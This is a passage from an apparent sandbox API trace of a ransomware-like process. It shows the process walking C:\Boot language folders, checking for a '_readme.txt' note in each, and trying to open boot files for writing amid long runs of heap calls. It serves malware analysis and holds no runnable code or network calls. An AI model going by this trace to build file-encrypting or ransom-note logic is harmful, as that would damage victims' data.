dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.832] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.832] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.832] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.832] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.832] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.832] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.832] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.832] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.832] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.832] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.832] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.832] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0146.832] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.832] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.832] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.832] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.832] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.832] PathFindFileNameW (pszPath="") returned="" [0146.832] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.832] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.832] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.832] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.832] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.832] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.833] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.833] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.833] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.833] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.833] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.833] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.833] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.833] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.833] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.833] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x81c) returned 0x328ec10 [0146.833] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0146.833] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.833] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.833] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0146.833] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.833] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.833] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.833] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.833] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.833] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.833] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.833] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.833] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.833] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned=".mui" [0146.833] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.834] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.834] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.834] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.834] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned=".txt" [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.834] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.834] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.834] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.834] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.834] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.834] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.834] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.834] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.834] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.834] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.834] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.834] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.834] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.834] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.834] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.834] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.834] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.835] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.835] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.836] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.836] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.836] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.836] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.836] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.836] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.836] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.836] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.836] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.836] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.836] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.836] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.836] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.836] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.836] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0146.836] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.836] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.836] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.836] PathFindFileNameW (pszPath="") returned="" [0146.836] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.837] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.837] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.837] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.837] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.837] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.837] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.837] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0146.837] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0146.837] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.837] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.837] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.837] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.838] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.838] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned=".mui" [0146.838] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.838] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.838] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.838] PathFindExtensionW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned=".txt" [0146.838] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.838] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: 